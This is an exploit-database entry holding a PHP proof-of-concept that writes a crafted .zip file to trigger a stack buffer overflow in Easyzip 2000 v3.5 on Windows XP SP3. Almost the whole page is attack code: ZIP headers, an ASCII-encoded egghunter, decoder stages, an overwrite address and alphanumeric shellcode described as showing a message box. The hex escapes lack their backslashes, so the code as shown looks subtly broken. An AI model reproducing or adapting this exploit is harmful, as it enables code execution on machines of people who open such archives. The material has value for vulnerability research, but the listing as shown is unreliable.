Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit
# Published : 2010-04-25
# Author : mr_me
# Previous Title : IDEAL Migration 2009 v4.5.1 Local Buffer Overflow Exploit
# Next Title : WM Downloader v3.0.0.9 Buffer Overflow (Meta)

<?php
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit
Author: mr_me - http://net-ninja.net/
Download: http://www.thefreesite.com/ezip35.exe
Platform: Windows XP sp3
Advisory: http://www.corelan.be:8800/advisories.php?id=10-032
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
 
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ascii lowercase and payload space < 400 bytes, yet we still get code execution.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
 
// local file header
$lf_header = "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00".
"x00x00x00x00x00x00x00x00xe4x0fx00x00x00";
 
// central directory file header
$cdf_header = "x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00".
"x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";
 
// end of central directory record
$efcdr_record = "x50x4Bx05x06x00x00x00x00x01x00x01x00".
"x12x10x00x00x02x10x00x00x00x00";

// filename
$_____name = "x6Dx72x5Fx6Dx65x73x5Fx73x65x63x72x65x63x74".
"x5Fx70x61x73x73x77x6Fx72x64x73x2Ex74x78x74";
 
// corelan security team msgbox
$_____sc = "VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJEON4F1W9M490R0P08654E2".
"M9Y2F64346K5K450115MN2G0N0B0L5C5DKO106737KO9W8P0O2L1L0P184E3U0Q8P1G3L5O9R601E671O9W".
"343QOO113RJOLK8M640M1K3WOL1W4Y2O613V2I4K5C0R0S0PMO2O3W2O8K9R1Z1K0S1H3PLMKM5KKK8M0S4".
"JJL15612J1267KM2K4D903K03";

// lowercase ascii encoded egghunter
$eh = "j314d34djq34djk34d1431s11s7j314d34dj234dkms502ds5o0d35upj51g4241n20b0d5".
"225737445m51c5k5dk4j49b591e7b5k4k385bk2j55bk59359927";
 
$decoderStage1 = "x25x4ax4dx4ex55x25x35x08x31x2a".
"x2dx49x49x49x5ex2dx4ax49x4ax5ex2dxc1xc1xc1x5f";

$decoderStage2 = "x25x4Ax4dx4ex55x25x10x10x31x10".
"x2dx2ax69x37xc1x2dx2ax69x36xc1x2dx2bx6axb1x9b";

$align = "x60".str_repeat("x5d",7);

$___exploit = $_____name.str_repeat("x61",249).$eh.str_repeat("x61",144-strlen($eh))."x60".
str_repeat("x5b",8).$decoderStage1.$align.$decoderStage2.$align."x98x8ex89xf1x64x64".
"x16x32x40x00";
$___exploit .= str_repeat("x61",2000-strlen($___exploit))."x57x30x30x54x57x30x30x54".$_____sc.
str_repeat("x61",2056-strlen($_____sc))."x2ex74x78x74";
            
$_____b00m = $lf_header.$___exploit.$cdf_header.$___exploit.$efcdr_record;
file_put_contents("cst-easyzip.zip",$_____b00m);
?>